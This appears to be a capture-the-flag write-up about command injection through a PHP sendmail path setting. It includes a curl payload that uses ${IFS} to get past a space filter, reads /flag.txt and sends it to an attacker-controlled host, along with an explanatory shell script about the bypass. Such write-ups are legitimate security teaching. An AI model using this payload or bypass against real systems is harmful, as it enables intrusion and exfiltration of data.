Once we have downloaded the files, we inspect the Dockerfile. As we can see, the flag is stored in /flag.txt:
So I decided to take a look at IndexController.php:
First of all, we can't use spaces, and $sendMailPath is vulnerable to command injection. In this case we can use a special shell variable of Unix systems, ${IFS}, which stands for "Internal Field Separator". The shell uses its characters (by default space, tab and newline) to split a command line into words, so an unquoted ${IFS} expands to whitespace and separates arguments exactly as a literal space would. The trick only works because the value reaches the shell unquoted: had the application wrapped it with escapeshellarg(), the single quotes would have kept ${IFS} as literal text and the `;` would never have ended the sendmail command.
- I've created a note related to this, because it seems interesting to me to have this stored here from now on: Unix Environment Variables
Payload: `/usr/sbin/sendmail;curl${IFS}https://YOUR_IP/?x=$(cat${IFS}/flag.txt)`

The `;` terminates the sendmail command, `${IFS}` supplies the space between curl and its URL, and the `$(...)` command substitution runs `cat /flag.txt` on the target and inlines its output into the query string, so the flag arrives with the HTTP request.
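To see concretely why the payload works, here is an added example (not code from the original write-up or the challenge): it reproduces the space filter, shows how the shell splits `cat${IFS}/flag.txt` into two words, and shows the two conditions the trick depends on. The filter shape (only the literal space is rejected), the `-t` the application is assumed to append after the injected path, and the use of /bin/true and echo in place of sendmail and curl are assumptions so that it runs offline.

```sh
#!/bin/sh
# Added example, not code from the original write-up. It shows why ${IFS} can
# stand in for a space when the literal space is filtered, and what the trick
# depends on: the injected text must reach the shell unquoted, and `#` only
# starts a comment when it begins a token.

# Stand-in for the application's blacklist (assumption: it only rejects the
# literal space character). Returns 0 (true) when the input would be rejected.
filter_rejects() {
    case "$1" in
        *' '*) return 0 ;;
        *)     return 1 ;;
    esac
}

# Reproduce the target shell's treatment of a payload fragment and report how
# many words it becomes. The caller passes the fragment in single quotes, so it
# arrives with ${IFS} still literal; eval mimics the vulnerable shell call.
word_count() {
    eval "set -- $1"
    printf '%s\n' "$#"
}

# Return the n-th word of the same expansion, to see where the split happened.
word_at() {
    n=$2
    eval "set -- $1"
    shift "$((n - 1))"
    printf '%s\n' "$1"
}

# Same fragment, but landing inside double quotes: ${IFS} still expands, yet no
# field splitting happens, so it stays one word and the trick fails.
quoted_word_count() {
    eval "set -- \"$1\""
    printf '%s\n' "$#"
}

# Assumed shape of the vulnerable call: the user-controlled path is interpolated
# unquoted into a command line run by a shell (the page does not show the exact
# line). Harmless stand-ins replace sendmail and curl so this runs offline.
run_vulnerable() {
    sh -c "$1 -t"
}

if filter_rejects 'cat /flag.txt'; then
    printf '%s\n' 'cat /flag.txt       : rejected by the filter'
fi
if ! filter_rejects 'cat${IFS}/flag.txt'; then
    printf '%s\n' 'cat${IFS}/flag.txt : passes the filter'
fi
printf 'words after expansion  : %s\n' "$(word_count 'cat${IFS}/flag.txt')"        # 2
printf 'word 1 / word 2        : %s %s\n' \
    "$(word_at 'cat${IFS}/flag.txt' 1)" "$(word_at 'cat${IFS}/flag.txt' 2)"         # cat /flag.txt
printf 'words if double-quoted : %s\n' "$(quoted_word_count 'cat${IFS}/flag.txt')" # 1

# `;#` ends the injected command and turns the appended `-t` into a comment.
printf 'injected, ;# suffix    : %s\n' "$(run_vulnerable '/bin/true;echo${IFS}pwned;#')"          # pwned
# `${IFS}#` does NOT comment anything out: tokenisation happens before expansion,
# so the `#` is just another argument and `-t` is still passed to echo.
printf 'injected, ${IFS}# suffix: %s\n' "$(run_vulnerable '/bin/true;echo${IFS}pwned${IFS}#')" # pwned # -t
```

The last two lines are the practical caveat when building such payloads: operators like `;` are recognised at tokenisation time, but the whitespace produced by `${IFS}` only appears after expansion, so anything that has to be seen as a separate token by the parser (a `#` comment, a `|`, a `&&`) must be written literally, while anything that only needs to be a separate argument to a program can be separated with `${IFS}`.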
So here I'll be using Webhook.site as a temporary web server and send the curl output there:
Then I check the webhook's request log: